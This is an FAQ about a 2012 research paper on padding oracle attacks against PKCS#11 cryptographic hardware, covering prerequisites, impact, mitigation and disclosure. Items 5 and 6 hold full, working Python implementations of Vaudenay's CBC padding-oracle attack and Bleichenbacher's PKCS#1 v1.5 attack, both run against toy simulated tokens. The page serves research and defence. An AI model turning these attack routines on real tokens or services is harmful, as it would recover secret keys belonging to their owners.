"Efficient Padding Oracle Attacks on Cryptographic Hardware" FAQ

  1. Where can I find a copy of the paper? Where is it being published?

    Here. It will appear at CRYPTO'12 in August 2012.

  2. Where can I read a less technical account?

    Matthew Green's blog provides a nice write-up.

  3. Who carried out this research, and what are their affiliations?

    Romain Bardou (INRIA project Secsi, France), Riccardo Focardi (Università Ca' Foscari Venezia, Italy), Yusuke Kawamoto (University of Birmingham, UK), Lorenzo Simionato (Università Ca' Foscari Venezia, Italy), Graham Steel (INRIA project ProSecCo, France), Joe-Kai Tsay (Norges teknisk-naturvitenskapelige universitet, Norway).

    Some of the work was carried out while Kawamoto, Steel, and Tsay were working in INRIA project Secsi at LSV, ENS-Cachan. Simionato is now at Google.

  4. What are the prerequisites for these attacks?

    You need access to the UnwrapKey function of the device (C_UnwrapKey in PKCS#11), together with the wrapped key (ciphertext) you want to attack. Access could be achieved, for example, directly by putting malware on the host machine that talks to the device, or indirectly if the unwrap-key functionality is exposed via a network protocol.

  5. What are the consequences of these attacks?

    The modified version of the Bleichenbacher attack recovers the plaintext of a ciphertext encrypted under an RSA public key with PKCS#1 v1.5 padding. In the context of the PKCS#11 UnwrapKey command, that plaintext is a symmetric key. The same attack can also be used to forge a signature under the device's RSA key, though this takes longer. Our paper gives full details.

    The Vaudenay CBC padding oracle attack recovers the plaintext of a key wrapped under a symmetric cipher such as AES in CBC_PAD mode, so it may reveal either a symmetric key or an RSA private key, whichever has been exported from the device that way.
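    As an added illustration (not code from the paper or its authors), the Python below models the CBC_PAD case with a hypothetical Token class whose unwrap_key reveals only whether the padding of the decrypted wrapped key was valid, and runs Vaudenay's byte-by-byte recovery against a key wrapped under it. A small Feistel construction built from HMAC-SHA256 stands in for AES so that nothing beyond the standard library is needed; the attack never looks inside the cipher, only at the CBC structure, so the same code applies unchanged to AES. The KEK, the target key and the IV are constructed values.

```python
import hashlib
import hmac

BLOCK = 16  # 16-byte blocks, as for AES
KEK = b"constructed-kek!"  # constructed key-encryption key held by the token

def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def _round(key, half, i):
    return hmac.new(key, bytes([i]) + half, hashlib.sha256).digest()[:8]

def block_encrypt(key, block):
    """Toy 4-round Feistel cipher standing in for AES; the attack never looks inside it."""
    l, r = block[:8], block[8:]
    for i in range(4):
        l, r = r, _xor(l, _round(key, r, i))
    return l + r

def block_decrypt(key, block):
    l, r = block[:8], block[8:]
    for i in reversed(range(4)):
        l, r = _xor(r, _round(key, l, i)), l
    return l + r

def pad(data):  # PKCS#7 padding, as used by the PKCS#11 *_CBC_PAD mechanisms
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n

def unpad(data):
    n = data[-1] if data else 0
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return data[:-n]

def cbc_encrypt(key, iv, plaintext):
    out, prev = b"", iv
    for i in range(0, len(plaintext), BLOCK):
        prev = block_encrypt(key, _xor(plaintext[i:i + BLOCK], prev))
        out += prev
    return out

def cbc_decrypt(key, iv, ciphertext):
    out, prev = b"", iv
    for i in range(0, len(ciphertext), BLOCK):
        out += _xor(block_decrypt(key, ciphertext[i:i + BLOCK]), prev)
        prev = ciphertext[i:i + BLOCK]
    return out

class Token:
    """Hypothetical device: the caller supplies the IV, and UnwrapKey reveals
    only whether the padding of the decrypted wrapped key was valid."""
    def __init__(self, kek):
        self._kek, self.calls = kek, 0  # calls counts oracle queries made

    def unwrap_key(self, iv, wrapped):
        self.calls += 1
        try:
            unpad(cbc_decrypt(self._kek, iv, wrapped))
            return True  # "padding OK": this single bit is the oracle
        except ValueError:
            return False

def padding_oracle_attack(token, iv, wrapped):
    """Vaudenay's attack: recover the wrapped plaintext from the padding bit
    alone, one byte at a time from right to left, using one-block queries."""
    blocks = [iv] + [wrapped[i:i + BLOCK] for i in range(0, len(wrapped), BLOCK)]
    plaintext = b""
    for prev, target in zip(blocks, blocks[1:]):
        inter = bytearray(BLOCK)  # D_KEK(target), the raw block-cipher output
        for pos in range(BLOCK - 1, -1, -1):
            padval = BLOCK - pos
            forged = bytearray(BLOCK)  # crafted IV for the query (forged, target)
            for j in range(pos + 1, BLOCK):
                forged[j] = inter[j] ^ padval  # known bytes now decrypt to padval
            for guess in range(256):
                forged[pos] = guess
                if not token.unwrap_key(bytes(forged), target):
                    continue
                if pos == BLOCK - 1:
                    # A hit on the last byte could be a longer padding (02 02, ...)
                    # rather than 01: disturb the byte to the left and re-check.
                    forged[pos - 1] ^= 0xFF
                    still_ok = token.unwrap_key(bytes(forged), target)
                    forged[pos - 1] ^= 0xFF
                    if not still_ok:
                        continue
                inter[pos] = guess ^ padval
                break
        plaintext += _xor(inter, prev)
    return unpad(plaintext)

def demo():
    """Wrap a constructed 16-byte key, recover it, return (ok, oracle calls)."""
    target_key = bytes(range(0x10, 0x20))  # constructed key to be recovered
    iv = bytes(range(BLOCK))               # constructed IV
    wrapped = cbc_encrypt(KEK, iv, pad(target_key))  # what WrapKey would return
    token = Token(KEK)
    recovered = padding_oracle_attack(token, iv, wrapped)
    return recovered == target_key, token.calls
```

    demo() returns (True, calls). A wrapped 16-byte key is two ciphertext blocks once padded, so recovery costs at most 256 oracle calls per byte, roughly 4,000 on average, and needs no knowledge of the KEK: the only thing the device gives away is whether UnwrapKey rejected the padding, and that is enough.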

  6. How much do you improve on previous attacks on PKCS#1v1.5 ?

    The best previous attack was due to Klíma et al., which is roughly twice as fast as Bleichenbacher's original algorithm on a standard PKCS#1 v1.5 padding oracle. Our attack is more than ten times as fast as the original algorithm, so a factor of five improvement on the best previously known attack. Here we measure speed as the median number of oracle calls required to complete the attack, measured over 1000 runs with different RSA keypairs.
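    To make the oracle, the attack and the call-count metric concrete, here is an added Python example (not the authors' code; it implements Bleichenbacher's original 1998 algorithm, not the paper's optimised variant) run against a hypothetical Token whose unwrap_key reports only whether the decrypted block starts with 00 02. The RSA key is a constructed toy built from two Mersenne primes; because its 234-bit modulus is not a whole number of bytes, conforming values make up about 2^-10 of the space rather than the roughly 2^-16 of a real 1024- or 2048-bit key, so the oracle-call count it reports is far lower than the paper's figures and not comparable to them.

```python
# Toy RSA key from two Mersenne primes, so the example is self-contained and
# deterministic. The 234-bit modulus is not a whole number of bytes, which makes
# conforming values about 2^-10 of the space instead of ~2^-16 as for a real
# key, so this run needs far fewer oracle calls than a realistic one (and the
# key is of course far too small for real use).
P, Q, E = 2**127 - 1, 2**107 - 1, 65537
N = P * Q
D = pow(E, -1, (P - 1) * (Q - 1))  # private exponent (needs Python 3.8+)
K = (N.bit_length() + 7) // 8        # modulus length in bytes: 30
B = 2 ** (8 * (K - 2))               # blocks starting 00 02 lie in [2B, 3B)


def pkcs1v15_pad(msg):
    """EME-PKCS1-v1_5: 00 02 <nonzero padding, at least 8 bytes> 00 <msg>."""
    ps_len = K - 3 - len(msg)
    assert ps_len >= 8, "message too long for this modulus"
    ps = bytes((37 * i + 11) % 255 + 1 for i in range(ps_len))  # constructed, nonzero
    return b"\x00\x02" + ps + b"\x00" + msg


def pkcs1v15_unpad(block):
    assert block[:2] == b"\x00\x02"
    return block[block.index(b"\x00", 2) + 1:]


class Token:
    """Hypothetical device holding D. Its UnwrapKey answers only whether the
    decrypted block starts with 00 02: the classic Bleichenbacher oracle."""

    def __init__(self):
        self.calls = 0  # oracle queries made against this token

    def unwrap_key(self, c):
        self.calls += 1
        return pow(c, D, N).to_bytes(K, "big")[:2] == b"\x00\x02"


def _ceil_div(a, b):
    return -(-a // b)


def _merge(intervals):
    """Union of closed integer intervals, sorted and with overlaps merged."""
    merged = []
    for lo, hi in sorted(intervals):
        if merged and lo <= merged[-1][1] + 1:
            merged[-1] = (merged[-1][0], max(merged[-1][1], hi))
        else:
            merged.append((lo, hi))
    return merged


def bleichenbacher(oracle, c):
    """Bleichenbacher's original 1998 algorithm (not the paper's optimised
    variant). c must already be conforming, so the blinding step is skipped
    and the recovered value is the padded block m = c^D mod N itself."""
    def conforming(s):  # does m*s mod N land in [2B, 3B)?
        return oracle(c * pow(s, E, N) % N)
    M = [(2 * B, 3 * B - 1)]  # candidate intervals for m
    s = _ceil_div(N, 3 * B)   # step 2a: smallest s that can wrap m*s past N
    while not conforming(s):
        s += 1
    while True:
        new_M = []  # step 3: every (interval, r) consistent with m*s - r*N in [2B, 3B)
        for a, b in M:
            for r in range(_ceil_div(a * s - 3 * B + 1, N), (b * s - 2 * B) // N + 1):
                lo = max(a, _ceil_div(2 * B + r * N, s))
                hi = min(b, (3 * B - 1 + r * N) // s)
                if lo <= hi:
                    new_M.append((lo, hi))
        M = _merge(new_M)
        if len(M) == 1 and M[0][0] == M[0][1]:
            return M[0][0]  # step 4: a single candidate left
        if len(M) > 1:  # step 2b: several intervals, keep scanning s upwards
            s += 1
            while not conforming(s):
                s += 1
        else:  # step 2c: one interval [a, b], jump to s values that roughly halve it
            a, b = M[0]
            r = _ceil_div(2 * (b * s - 2 * B), N)
            while True:
                lo_s, hi_s = _ceil_div(2 * B + r * N, b), (3 * B - 1 + r * N) // a
                s = next((t for t in range(lo_s, hi_s + 1) if conforming(t)), None)
                if s is not None:
                    break
                r += 1


def demo():
    """Encrypt a constructed 16-byte key to the public key (what WrapKey would
    emit), then recover it through the oracle; returns (success, oracle calls)."""
    key = bytes(range(0xA0, 0xB0))  # constructed key to be recovered
    c = pow(int.from_bytes(pkcs1v15_pad(key), "big"), E, N)
    token = Token()
    m = bleichenbacher(token.unwrap_key, c)
    recovered = pkcs1v15_unpad(m.to_bytes(K, "big"))
    return recovered == key, token.calls
```

    demo() returns (True, calls). The counter on the token is the quantity used above as the speed measure; the paper's improvements attack exactly this count, and the paper reports its medians over 1000 runs with different keys. Note that the oracle here is the weakest one (it checks only the two leading bytes); a device that also checks the rest of the padding gives the attacker less information per call, and the paper treats those oracle variants separately.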

  7. Is there a patch for the PKCS#1v1.5 vulnerability?

    Yes: use a padding mode that has IND-CCA security proofs, like OAEP as standardised in PKCS#1 v2, and make sure this is the only mode available at the API. Removing PKCS#1 v1.5 entirely matters because a v1.5 padding oracle lets an attacker compute the private RSA operation on any ciphertext for that key, so leaving v1.5 enabled alongside OAEP on the same key still exposes the OAEP-wrapped keys.

  8. Do the attacks in the paper reveal the private half of RSA keypairs?

    Like the original algorithm, our version of the Bleichenbacher attack does not reveal the private half of the RSA key used for encryption. Each run recovers one plaintext (or forges one signature), and the attack has to be repeated, with fresh oracle calls, for every further ciphertext or message.

  9. Do your attacks reveal the seed values used to generate one time passwords (OTPs) on an RSA token?


  10. Did you follow "responsible disclosure" procedures?

    Yes. All affected vendors were informed more than 12 months before the paper was published.

Last modified: Wed Jun 27 11:53:32 EDT 2012